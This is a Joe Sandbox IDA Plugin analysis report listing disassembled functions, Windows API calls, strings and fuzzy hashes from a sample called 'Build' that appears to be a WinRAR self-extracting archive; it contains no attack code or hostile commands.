Opcode ID: ec581db4e7d4ace5580cbc9589ed8a0ea0c65b904a757006582780e7520b5db4
Instruction ID: bd66ee99c20b9556d60737c0a778bba3d13158b587d9ca418995d5ef73814d0b
Opcode Fuzzy Hash: ec581db4e7d4ace5580cbc9589ed8a0ea0c65b904a757006582780e7520b5db4
Instruction Fuzzy Hash: BB715CB0A00229AFDB14DFA5DC94EBEB7B9FF88711B540169F516E72A0CB34AD01CB50

Function 009332F8 Relevance: 12.1, APIs: 8, Instructions: 131timeCOMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 0093331D

Part of subcall function 0092D076: GetVersionExW.KERNEL32(?), ref: 0092D0A7

FileTimeToLocalFileTime.KERNEL32(000000FF,?,?,000000FF,00000064,00000000,?,00000000), ref: 00933340
FileTimeToSystemTime.KERNEL32(000000FF,?,?,000000FF,00000064,00000000,?,00000000), ref: 00933352
SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00933363
SystemTimeToFileTime.KERNEL32(?,?), ref: 00933373
SystemTimeToFileTime.KERNEL32(?,?), ref: 00933383
FileTimeToSystemTime.KERNEL32(?,?,?), ref: 009333BE
__aullrem.LIBCMT ref: 00933464

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
String ID:
API String ID: 1247370737-0
Opcode ID: fc9bbfa5d08590ad206b383b3fa46c451fb3522b0c82d2a040c78ef106b00b83
Instruction ID: 530b9895676566848309514a1eb49d79170be093c8e9881eb241ebb8745b5548
Opcode Fuzzy Hash: fc9bbfa5d08590ad206b383b3fa46c451fb3522b0c82d2a040c78ef106b00b83
Instruction Fuzzy Hash: E05134B1548345AFC710DF65C88496BFBE9FB88715F408A2EF596C3210E774EA48CB62

Function 0093BC7E Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 183COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0093BC8A

Strings

>, xrefs: 0093BCCB
<br>, xrefs: 0093BD7E
</p>, xrefs: 0093BD68
<style>, xrefs: 0093BDB0
</style>, xrefs: 0093BDD2

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: _wcslen
String ID: </p>$</style>$<br>$<style>$>
API String ID: 176396367-3568243669
Opcode ID: 6d70ad5bbcf7ab98970d9659fc93c5e2fbcb4c42bb89ba530365736c07d6820e
Instruction ID: dc1ca8545ae0939cef89bb8f002f942ef4ddf4de0c0a437fe5c3ea43364e62a4
Opcode Fuzzy Hash: 6d70ad5bbcf7ab98970d9659fc93c5e2fbcb4c42bb89ba530365736c07d6820e
Instruction Fuzzy Hash: 92512BA6B4435756DB305E59982277763E8DFA0790F68042BFFC18B1C0FB758D818BA1

Function 00951CDD Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00952452,00000000,00000000,00000000,00000000,00000000,00947A3D), ref: 00951D1F
__fassign.LIBCMT ref: 00951D9A
__fassign.LIBCMT ref: 00951DB5
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 00951DDB
WriteFile.KERNEL32(?,00000000,00000000,00952452,00000000,?,?,?,?,?,?,?,?,?,00952452,00000000), ref: 00951DFA
WriteFile.KERNEL32(?,00000000,00000001,00952452,00000000,?,?,?,?,?,?,?,?,?,00952452,00000000), ref: 00951E33

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 257caa735fdbaa2ea835f4c2cd55e2525123b7b1072070f2e5f7c5918ceeb965
Instruction ID: 8435adde7a80b94c5940631ddcd383188e2678003a7bba6e6673d4f872acf03b
Opcode Fuzzy Hash: 257caa735fdbaa2ea835f4c2cd55e2525123b7b1072070f2e5f7c5918ceeb965
Instruction Fuzzy Hash: 0251D175A00249AFDB10CFA9D886BEEBBF8FF09301F14451AED55E7291E7309948CB60

Function 0092ACE8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 149fileCOMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNEL32(?,?,00000800), ref: 0092AD2B
GetShortPathNameW.KERNEL32(?,?,00000800), ref: 0092AD4A

Part of subcall function 0092E208: _wcslen.LIBCMT ref: 0092E210

Part of subcall function 00934168: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,000000FF,0092E084,00000000,.exe,?,?,00000800,?,?,?,0093AD5D), ref: 0093417E

_swprintf.LIBCMT ref: 0092ADEC

Part of subcall function 00924C00: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00924C13

MoveFileW.KERNEL32(?,?), ref: 0092AE5E
MoveFileW.KERNEL32(?,?), ref: 0092AE9E

Strings

rtmp%d, xrefs: 0092ADD5

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: FileMoveNamePath$CompareLongShortString__vswprintf_c_l_swprintf_wcslen
String ID: rtmp%d
API String ID: 2133196417-3303766350
Opcode ID: a9a674c3a27b32375f43ad3ebfd93fc50cdd8e7223c26dbdc6c47e9d3d28dac1
Instruction ID: ffd68ff2e542b8e1d57bb6f8e777502234ab6a9042b9064a629b7abc69a67b4f
Opcode Fuzzy Hash: a9a674c3a27b32375f43ad3ebfd93fc50cdd8e7223c26dbdc6c47e9d3d28dac1
Instruction Fuzzy Hash: CE519472900628ABCF20EB60EC85FEF737CAF54341F4508A9B556E3145EB389A85DF61

Function 0093BE55 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

ShowWindow.USER32(?,00000000), ref: 0093BE8A
GetWindowRect.USER32(?,?), ref: 0093BED1
ShowWindow.USER32(?,00000005,00000000), ref: 0093BF6C
SetWindowTextW.USER32(?,00000000), ref: 0093BF74
ShowWindow.USER32(00000000,00000005), ref: 0093BF8A

Strings

RarHtmlClassName, xrefs: 0093BF31

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: Window$Show$RectText
String ID: RarHtmlClassName
API String ID: 3937224194-1658105358
Opcode ID: dc6cc47b18c8d52d9f14c7018bccca78322d9a7e9c55e7d3f80c2edccc02112c
Instruction ID: b1c52624bc498c2aaeda489b39e354c44846abbca8f8667f01dfea4b9fdf9e62
Opcode Fuzzy Hash: dc6cc47b18c8d52d9f14c7018bccca78322d9a7e9c55e7d3f80c2edccc02112c
Instruction Fuzzy Hash: 1941837251C304AFCB21AFA8DC49B6BBBECEF88711F154559FA499A251DB30D804CFA1

Function 00944F20 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00944F57
___except_validate_context_record.LIBVCRUNTIME ref: 00944F5F
_ValidateLocalCookies.LIBCMT ref: 00944FE8
__IsNonwritableInCurrentImage.LIBCMT ref: 00945013
_ValidateLocalCookies.LIBCMT ref: 00945068

Strings

csm, xrefs: 00944FFD

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 6f41189c9e79ce6aa57ccab0cd0eaae3f689cbc384aabe98cad20914536b94bc
Instruction ID: 989457f8324cb871a44f505db70fd4a64ead370ec10bcebb01d86ff47820c54b
Opcode Fuzzy Hash: 6f41189c9e79ce6aa57ccab0cd0eaae3f689cbc384aabe98cad20914536b94bc
Instruction Fuzzy Hash: EC41B634A002189FCF10DF69C885F9EBBB9BF49318F148196F914AB392D731A919CB91

Function 0093B8D5 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 106COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0093B8DE
_wcslen.LIBCMT ref: 0093B913

Strings

<style>body{font-family:"Arial";font-size:12;}</style>, xrefs: 0093B907
 , xrefs: 0093B9A1
<br>, xrefs: 0093B95F
, xrefs: 0093B930

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: _wcslen
String ID: $ $<br>$<style>body{font-family:"Arial";font-size:12;}</style>
API String ID: 176396367-3743748572
Opcode ID: f0036231a9743634c30c3c217a85241103b07ac900f68bf825af6ec325a6aed3
Instruction ID: 73ecd3dc69df4680c1e73fc400a4e1d1adaf7bc89d87602e3d3258c59a42a458
Opcode Fuzzy Hash: f0036231a9743634c30c3c217a85241103b07ac900f68bf825af6ec325a6aed3
Instruction Fuzzy Hash: 12318F6264430556DA34EF94AC42F7BB3E8EBD0328F60442FFB95972C0FB54AD8487A1

Function 0094EEF4 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0094EEB8: _free.LIBCMT ref: 0094EEE1

_free.LIBCMT ref: 0094EF42

Part of subcall function 0094BAFA: RtlFreeHeap.NTDLL(00000000,00000000,?,0094EEE6,?,00000000,?,00000000,?,0094EF0D,?,00000007,?,?,0094F30A,?), ref: 0094BB10
Part of subcall function 0094BAFA: GetLastError.KERNEL32(?,?,0094EEE6,?,00000000,?,00000000,?,0094EF0D,?,00000007,?,?,0094F30A,?,?), ref: 0094BB22

_free.LIBCMT ref: 0094EF4D
_free.LIBCMT ref: 0094EF58
_free.LIBCMT ref: 0094EFAC
_free.LIBCMT ref: 0094EFB7
_free.LIBCMT ref: 0094EFC2
_free.LIBCMT ref: 0094EFCD

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: ed90a822092467ab948ce4ab8a4e5ff1fef504289117e408d2aed02f462530fb
Instruction ID: 1d90d35ebb03736b111e300d88ee1587bca6b9d0ab39ebd001c836ddbe2a3571
Opcode Fuzzy Hash: ed90a822092467ab948ce4ab8a4e5ff1fef504289117e408d2aed02f462530fb
Instruction Fuzzy Hash: BE110A72940B04AEE620FBB1CC07FCB77ECBF84700F404C15F29AA6692DB75B5068654

Function 00940ACB Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,00940B46,00940AA9,00940D4A), ref: 00940AE2
GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00940AF8
GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00940B0D

Strings

AcquireSRWLockExclusive, xrefs: 00940AF2
ReleaseSRWLockExclusive, xrefs: 00940B02
KERNEL32.DLL, xrefs: 00940ADD

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
API String ID: 667068680-1718035505
Opcode ID: c0ba8cfed6404b4e6edf0a3308cc17b7474fe4e4d7e0a6b3c36042d667462ff0
Instruction ID: 0d0b0f5f6225c6c4b798ecadbc5fa89beaa2ce259277a3f2deff7719a7b5a2cb
Opcode Fuzzy Hash: c0ba8cfed6404b4e6edf0a3308cc17b7474fe4e4d7e0a6b3c36042d667462ff0
Instruction Fuzzy Hash: 1AF0AF313B57229B4F719FB64C89D6B628CDA8135A371043ADF15D3280EA708889A3D4

Function 0093418A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 39COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00934192
_wcslen.LIBCMT ref: 009341A3
_wcslen.LIBCMT ref: 009341B3
_wcslen.LIBCMT ref: 009341C1
CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,0092D2D3,?,?,00000000,?,?,?), ref: 009341DC

Strings

<, xrefs: 009341DC

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: _wcslen$CompareString
String ID: <
API String ID: 3397213944-4251816714
Opcode ID: 0a81cf2c214c11182997b848dca6e098b0e524f85402fce2cc0a7bf8f452ca7f
Instruction ID: 39b21aed2eebc5375d8eaacad86692ca2dbae543e0a7138c51d650a975917ede
Opcode Fuzzy Hash: 0a81cf2c214c11182997b848dca6e098b0e524f85402fce2cc0a7bf8f452ca7f
Instruction Fuzzy Hash: 42F03032148154BFCF121F91EC09DCE3F26EF91770B528415F6195A061CA32A9919BD1

Function 00933583 Relevance: 9.1, APIs: 6, Instructions: 104timeCOMMON

Download Yara Rule

APIs

SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 009335E6

Part of subcall function 0092D076: GetVersionExW.KERNEL32(?), ref: 0092D0A7

LocalFileTimeToFileTime.KERNEL32(?,?), ref: 0093360A
FileTimeToSystemTime.KERNEL32(?,?), ref: 00933624
TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00933637
SystemTimeToFileTime.KERNEL32(?,?), ref: 00933647
SystemTimeToFileTime.KERNEL32(?,?), ref: 00933657

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion
String ID:
API String ID: 2092733347-0
Opcode ID: 9239bb78d8515fc57d4dfd770f5722e45198b022f2ee51595910516417e06ee1
Instruction ID: 8b1e16dadb7ad37331a492f2702a783f496610e8fedc089bc825c82f5d6cf692
Opcode Fuzzy Hash: 9239bb78d8515fc57d4dfd770f5722e45198b022f2ee51595910516417e06ee1
Instruction Fuzzy Hash: E14148761183059FCB04DFA9C8859ABB7E8FF98714F44891EF999C7210E730D908CBA6

Function 0094511A Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00945111,00944ECC,009421B4), ref: 00945128
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00945136
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0094514F
SetLastError.KERNEL32(00000000,00945111,00944ECC,009421B4), ref: 009451A1

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 95e084e95463e4165e0ce4d75de280e63bc64513c13216993e9470fa0b4d4250
Instruction ID: f3f508c01dd3f681c88d9a3b9d008e620aae98ef5d2be9230809f24fb4987fe6
Opcode Fuzzy Hash: 95e084e95463e4165e0ce4d75de280e63bc64513c13216993e9470fa0b4d4250
Instruction Fuzzy Hash: CC012B7212DF116FA7252BF5BC86F2B2B58EB86375BB1132DF110850E2EF919C50E244

Function 0094B9A5 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,009650C4,00946E12,009650C4,?,?,0094688D,?,?,009650C4), ref: 0094B9A9
_free.LIBCMT ref: 0094B9DC
_free.LIBCMT ref: 0094BA04
SetLastError.KERNEL32(00000000,?,009650C4), ref: 0094BA11
SetLastError.KERNEL32(00000000,?,009650C4), ref: 0094BA1D
_abort.LIBCMT ref: 0094BA23

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: 612bda44ce2547dd9a1a107d4d13a0f87b3f4f9c0df96c0337a9789a278e997f
Instruction ID: 568635275431ae471a64bbec2c780fa6f5f514f32f91da46024850435a3b326f
Opcode Fuzzy Hash: 612bda44ce2547dd9a1a107d4d13a0f87b3f4f9c0df96c0337a9789a278e997f
Instruction Fuzzy Hash: A4F0F636109A016BC656733AAD0AF6F25BDDFC1739F200514F615E72D2FF65CC02A260

Function 0094004D Relevance: 9.0, APIs: 6, Instructions: 42windowsynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,0000000A), ref: 00940059
PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00940073
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00940084
TranslateMessage.USER32(?), ref: 0094008E
DispatchMessageW.USER32(?), ref: 00940098
WaitForSingleObject.KERNEL32(?,0000000A), ref: 009400A3

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: Message$ObjectSingleWait$DispatchPeekTranslate
String ID:
API String ID: 2148572870-0
Opcode ID: 1243d9b75efd3212e63fa7be2997c6c1474b24e4d45f227608224ef42f93a055
Instruction ID: c0446eb284c98dd11bce7b300be3529d174dc373745d561e5bff428b68df801e
Opcode Fuzzy Hash: 1243d9b75efd3212e63fa7be2997c6c1474b24e4d45f227608224ef42f93a055
Instruction Fuzzy Hash: 67F04F72A05229BBCB205FE2DC4CECFBF6DEF41751B108411F60AD2150D634C545DBA0

Function 0093D41C Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 149COMMON

Download Yara Rule

APIs

EndDialog.USER32(?,00000001), ref: 0093D57B
GetDlgItemTextW.USER32(?,00000066,00001000,00000200), ref: 0093D591
SetDlgItemTextW.USER32(?,00000067,?), ref: 0093D5B9

Strings

Software\WinRAR SFX, xrefs: 0093D466
GETPASSWORD1, xrefs: 0093D548

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
